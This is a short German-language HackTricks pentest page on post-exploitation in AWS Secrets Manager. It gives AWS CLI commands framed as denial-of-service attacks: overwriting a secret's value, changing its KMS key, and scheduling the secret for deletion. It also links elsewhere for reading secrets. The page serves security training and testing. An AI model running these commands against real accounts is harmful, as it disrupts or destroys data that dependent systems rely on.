# AWS - Secrets Manager Post Exploitation {{#include ../../../banners/hacktricks-training.md}} ## Secrets Manager Für weitere Informationen siehe: {{#ref}} ../aws-services/aws-secrets-manager-enum.md {{#endref}} ### Secrets lesen Die **Secrets selbst sind sensible Informationen**, [siehe die Privesc-Seite](../aws-privilege-escalation/aws-secrets-manager-privesc.md), um zu lernen, wie man sie liest. ### DoS Secret-Wert ändern Durch das Ändern des Wertes des Secrets könntest du **das gesamte System, das von diesem Wert abhängt, DoS.** > [!WARNING] > Beachte, dass vorherige Werte ebenfalls gespeichert werden, sodass es einfach ist, zum vorherigen Wert zurückzukehren. ```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### DoS KMS-Schlüssel ändern ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### DoS Löschen von Geheimnissen Die minimale Anzahl an Tagen, um ein Geheimnis zu löschen, beträgt 7. ```bash aws secretsmanager delete-secret \ --secret-id MyTestSecret \ --recovery-window-in-days 7 ``` {{#include ../../../banners/hacktricks-training.md}}